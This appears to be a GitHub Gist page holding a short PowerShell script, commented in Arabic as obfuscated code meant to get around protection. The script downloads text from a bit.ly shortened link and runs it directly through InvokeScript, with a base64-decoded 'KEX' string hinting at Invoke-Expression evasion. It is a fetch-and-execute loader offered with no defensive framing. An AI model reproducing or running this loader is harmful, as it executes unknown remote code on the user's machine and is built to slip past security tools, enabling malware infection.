Skip to content

Instantly share code, notes, and snippets.

@giug-66
giug-66 / s,sp1
Last active May 15, 2026 15:15
script
# كود مشفر للالتفاف على الحماية
$u = 'http://bit.ly/4ug96e0'
$c = [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('S0VY'))
$w = New-Object Net.WebClient
$s = $w.DownloadString($u)
ExecutionContext.InvokeCommand.InvokeScript($s)